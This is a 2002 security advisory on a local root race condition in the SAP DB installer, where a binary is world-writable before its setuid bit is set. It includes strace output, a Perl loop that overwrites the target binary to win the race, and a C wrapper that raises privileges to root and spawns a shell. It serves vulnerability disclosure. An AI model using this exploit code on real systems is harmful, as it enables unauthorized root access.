VapidSAP.txt

`  
  
  
  
Vapid Labs  
SAP database local root vulnerability during installation.  
December 10, 2002  
  
I. BACKGROUND  
  
SAP DB is a Free Enterprise database (http://www.sapdb.org). An  
exploitable race condition exists during installation that can be won to  
yield root to a local malicous user. An executable is world writeable  
before a setuid bit is set by the installation program. This condition  
exists for both the production version 7.3.0.29 and the beta version  
7.4.3.7 beta (www.sapdb.org/tgz_linux.htm).  
  
  
II. DESCRIPTION  
  
Installation of the SAP database is done by the binary SDBINST. This  
first uncompresses the files, changes permissions and then runs a file  
integrity check. Once this check is completed setuid bits are added to  
two files. A large gap between this check and the setuid operation exists  
(a few seconds at i least). This gives us ample time to change the  
contents of the pre-setuid file.  
  
For the production 7.3.0.29 version:  
  
Before the setuid root bit is set, a log file is written to that a normal  
non-privilidged user can read. This file was located in  
/tmp/sapdb-server-linux-32bit-i386-7_3_0_29/y/config/install/.  
We simply watch that file for what is written to it just before the call  
to chmod and copy our malicious code over the target binary.  
  
  
Below is a partial analysis of SDBINST.  
  
chmod("/usr/sapdb/depend/pgm/lserver", 0100777) = 0  
  
.  
.  
.  
  
open("/tmp/sapdb-server-linux-32bit-i386-7_3_0_29/y/config/install/LIST7aad69a8$O_WRONLY|O_CREAT|O_TRUNC,  
0666) = 3  
fstat64(3, {st_mode=S_IFREG|0644, st_size=0, ...}) = 0  
fcntl64(0x3, 0x2, 0x1, 0x401a6ce0) = 0  
fstat64(3, {st_mode=S_IFREG|0644, st_size=0, ...}) = 0  
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,  
0) = 0x40024000  
write(3, "\"lib/libsqlca.a\" f1d67919f97aa15"..., 4096) = 4096  
write(3, "/PRECOM.ins\" 6e00ace2afd80ec50a1"..., 4096) = 4096  
  
.  
.  
  
chmod("/usr/sapdb/depend/pgm/lserver", 04775) = 0  
  
  
For the Beta 7.4.3.7 version:  
  
All of the files are checked for data integrity before the setuid bit is  
set, the installation no longer writes to a log file during this  
operation. It appears that just before the setuid bit is set a directory  
is created /opt/sapdb/depend/wrk. It proved more difficult to win the  
race using this directory creation as an indicator to copy our file over.  
I was able to win the race with a timed copy after the last file had been  
written from the archive and just before the integrity check had finished.  
  
Below is an analysis of the installation program SDBRUN.  
  
chmod("/opt/sapdb/depend/pgm/lserver", 0777) = 0  
.  
.  
  
20224 stat64("/opt/sapdb/depend/wrk", 0x8150c20) = -1 ENOENT (No such file or directory)  
20224 stat64("/opt/sapdb/depend", {st_mode=S_IFDIR|0775, st_size=4096, ...}) = 020224 mkdir("/opt/sapdb/depend/wrk", 0775) = 0  
20224 chmod("/opt/sapdb/depend/wrk", 0775) = 0  
20224 stat64("/opt/sapdb/depend/wrk", {st_mode=S_IFDIR|0775, st_size=4096, ...}) = 0  
20224 chown32(0x872b640, 0x5456, 0x5456) = 0  
20224 chown32(0x88c3f88, 0, 0x5456) = 0  
20224 chmod("/opt/sapdb/depend/pgm/dbmsrv", 04775) = 0  
20224 chown32(0x88c4870, 0, 0x5456) = 0  
20224 chmod("/opt/sapdb/depend/pgm/lserver", 04775) = 0  
  
  
  
III. ANALYSIS  
  
Local attackers can exploit this vulnerability to gain root access  
on a targeted system. The attacker would have needed previous knowledge  
of the system administrators SAP installation. To exploit the 7.4 beta  
version of this software an attacker would need to have a good idea of the  
target systems hardware type and speed.  
  
  
IV. EXPLOIT  
  
#!/bin/perl  
  
while (1) {  
  
$test =`grep -sh PRECOM.ins /tmp/sapdb-server-linux-32bit-i386-7_3_0_29/y/config/install/LIST*`;  
  
if ( $test =~ /PRECOM/ ) {  
system("cp /home/lwc/run /usr/sapdb/depend/pgm/lserver");  
exit(1);  
}  
  
}  
  
  
The code we would rather have in place is:  
  
---- run.c -----  
/*##Larry W. Cashdollar, [email protected]  
*##This is just a wrapper to boost our privs from euid(0) to uid(0)  
guid(0 */  
  
#include <stdio.h>  
#include <unistd.h>  
  
  
int  
main (void)  
{  
char *shell[2];  
shell[0] = "sh";  
shell[1] = NULL;  
if (!setreuid (0, 0))  
printf ("We have root, getting sgid perms and spawning shell.\n");  
else  
{  
printf ("Ack, We lost the race.\n");  
_exit (0);  
}  
setregid (0, 0);  
execve ("/bin/sh", shell, NULL);  
return(0);  
}  
------ run.c --------  
  
  
V. DETECTION  
  
sapdb-server-linux-32bit-i386-7_3_0_29, sapdb-all-linux-32bit-i386-7_4_3_7  
are the versions I used.  
  
VI. WORKAROUND  
  
Boot the system into single user mode only and ensure no other users are  
logged in during installation.  
  
VII. VENDOR FIX  
  
The vendor was never notified, and this issue was fixed in the latest  
release.  
  
VII. CVE INFORMATION  
  
The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project  
has not assigned an identification number to this issue.  
  
VIII. DISCLOSURE TIMELINE  
  
12/09/2002 Issue disclosed to iDEFENSE  
  
IX. CREDIT  
  
Larry W. Cashdollar (http://vapid.dhs.org) discovered this vulnerability.  
  
  
  
`